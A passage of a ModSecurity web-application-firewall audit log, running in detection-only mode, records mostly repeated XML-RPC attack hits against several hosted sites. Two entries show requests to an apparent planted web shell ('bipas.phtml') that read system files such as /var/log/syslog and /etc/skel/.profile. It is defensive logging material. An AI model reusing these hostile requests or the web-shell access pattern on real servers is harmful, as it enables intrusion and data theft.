"aE75fPVluSm0zKldlXcz9wAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006140832730 993368 (- - -) Stopwatch2: 1750006140832730 993368; combined=2410, p1=433, p2=1594, p3=44, p4=64, p5=172, sr=147, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b2a9a402-Z-- --62377c0f-A-- [15/Jun/2025:22:20:01.648876 +0530] aE75uN40YvvHR2Fi0mNIfgAAAAk 128.199.112.101 37532 127.0.0.1 7081 --62377c0f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 501 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --62377c0f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --62377c0f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE75uN40YvvHR2Fi0mNIfgAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006200684483 964450 (- - -) Stopwatch2: 1750006200684483 964450; combined=2422, p1=375, p2=1609, p3=50, p4=73, p5=192, sr=101, sw=123, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --62377c0f-Z-- --8399a16c-A-- [15/Jun/2025:22:20:36.473703 +0530] aE753DtuDRGAAnNiXIeglAAAAAg 18.214.138.148 45482 127.0.0.1 7081 --8399a16c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/syslog.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.214.138.148 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --8399a16c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2947 Connection: close Content-Type: text/html; charset=UTF-8 --8399a16c-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE753DtuDRGAAnNiXIeglAAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750006236469356 4400 (- - -) Stopwatch2: 1750006236469356 4400; combined=2395, p1=357, p2=1905, p3=39, p4=37, p5=57, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8399a16c-Z-- --ca68a20c-A-- [15/Jun/2025:22:20:51.739739 +0530] aE756_VluSm0zKldlXc0PAAAAAA 34.195.60.66 43610 127.0.0.1 7081 --ca68a20c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/skel&viewfile=//etc/skel/.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.195.60.66 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --ca68a20c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3328 Connection: close Content-Type: text/html; charset=UTF-8 --ca68a20c-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE756_VluSm0zKldlXc0PAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750006251734606 5184 (- - -) Stopwatch2: 1750006251734606 5184; combined=2797, p1=415, p2=2262, p3=42, p4=28, p5=50, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ca68a20c-Z-- --1651d77f-A-- [15/Jun/2025:22:21:01.050061 +0530] aE759M4euW2k9bZXhFmnbAAAAAo 128.199.112.101 45104 127.0.0.1 7081 --1651d77f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1651d77f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1651d77f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE759M4euW2k9bZXhFmnbAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006260105822 944306 (- - -) Stopwatch2: 1750006260105822 944306; combined=2447, p1=398, p2=1605, p3=47, p4=70, p5=200, sr=114, sw=127, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1651d77f-Z-- --901ee90b-A-- [15/Jun/2025:22:22:01.657376 +0530] aE76ML59833JshVCMq_b7QAAAAY 128.199.112.101 44328 127.0.0.1 7081 --901ee90b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 502 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --901ee90b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --901ee90b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (46+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (46+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE76ML59833JshVCMq_b7QAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006320700536 956896 (- - -) Stopwatch2: 1750006320700536 956896; combined=2284, p1=387, p2=1521, p3=42, p4=65, p5=165, sr=109, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --901ee90b-Z-- --39a1ac63-A-- [15/Jun/2025:22:23:01.998193 +0530] aE76bJK-05zbifgH_rQINQAAAAU 128.199.112.101 58868 127.0.0.1 7081 --39a1ac63-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 502 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --39a1ac63-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --39a1ac63-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE76bJK-05zbifgH_rQINQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006380995531 1002739 (- - -) Stopwatch2: 1750006380995531 1002739; combined=2599, p1=377, p2=1520, p3=65, p4=97, p5=337, sr=110, sw=203, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --39a1ac63-Z-- --ef01c327-A-- [15/Jun/2025:22:23:56.155426 +0530] aE76o4yPDo0nuh6ywVCH8wAAAAM 124.109.12.110 33672 127.0.0.1 7081 --ef01c327-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ef01c327-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --ef01c327-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE76o4yPDo0nuh6ywVCH8wAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006435909858 245633 (- - -) Stopwatch2: 1750006435909858 245633; combined=2430, p1=377, p2=1632, p3=83, p4=58, p5=173, sr=106, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef01c327-Z-- --2d10ce00-A-- [15/Jun/2025:22:24:01.961673 +0530] aE76qfVluSm0zKldlXc0oQAAAAA 128.199.112.101 36152 127.0.0.1 7081 --2d10ce00-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 502 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --2d10ce00-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2d10ce00-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE76qfVluSm0zKldlXc0oQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006441026920 934829 (- - -) Stopwatch2: 1750006441026920 934829; combined=2162, p1=392, p2=1364, p3=43, p4=66, p5=187, sr=123, sw=110, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2d10ce00-Z-- --fa79fd4d-A-- [15/Jun/2025:22:25:02.661406 +0530] aE765ZK-05zbifgH_rQIdAAAAAU 128.199.112.101 56584 127.0.0.1 7081 --fa79fd4d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --fa79fd4d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --fa79fd4d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE765ZK-05zbifgH_rQIdAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006501549229 1112234 (- - -) Stopwatch2: 1750006501549229 1112234; combined=2142, p1=387, p2=1361, p3=46, p4=68, p5=174, sr=111, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fa79fd4d-Z-- --92821124-A-- [15/Jun/2025:22:26:03.039953 +0530] aE77IhLQPChAjmM6-0i58AAAAAQ 128.199.112.101 59484 127.0.0.1 7081 --92821124-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --92821124-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --92821124-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE77IhLQPChAjmM6-0i58AAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006562051204 988805 (- - -) Stopwatch2: 1750006562051204 988805; combined=2817, p1=509, p2=1929, p3=43, p4=63, p5=171, sr=142, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92821124-Z-- --0c593565-A-- [15/Jun/2025:22:26:07.373361 +0530] aE77J5K-05zbifgH_rQImQAAAAU 124.109.12.110 59714 127.0.0.1 7081 --0c593565-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 676 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0c593565-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --0c593565-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE77J5K-05zbifgH_rQImQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006567130970 242459 (- - -) Stopwatch2: 1750006567130970 242459; combined=2019, p1=356, p2=1356, p3=45, p4=38, p5=142, sr=98, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c593565-Z-- --e4c7df6c-A-- [15/Jun/2025:22:27:03.273220 +0530] aE77XmCPauOs0aEe3c07ewAAAAI 128.199.112.101 55372 127.0.0.1 7081 --e4c7df6c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --e4c7df6c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e4c7df6c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE77XmCPauOs0aEe3c07ewAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006622356380 916896 (- - -) Stopwatch2: 1750006622356380 916896; combined=2169, p1=390, p2=1391, p3=44, p4=66, p5=174, sr=118, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e4c7df6c-Z-- --b6722e4a-A-- [15/Jun/2025:22:28:03.770002 +0530] aE77mt40YvvHR2Fi0mNJlQAAAAk 128.199.112.101 44942 127.0.0.1 7081 --b6722e4a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --b6722e4a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b6722e4a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE77mt40YvvHR2Fi0mNJlQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006682808906 961162 (- - -) Stopwatch2: 1750006682808906 961162; combined=2534, p1=368, p2=1760, p3=41, p4=64, p5=185, sr=106, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b6722e4a-Z-- --1c86f425-A-- [15/Jun/2025:22:28:06.776449 +0530] aE77nkmAj8yxyFrMChhwgQAAAAE 124.109.12.110 45484 127.0.0.1 7081 --1c86f425-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1c86f425-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --1c86f425-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 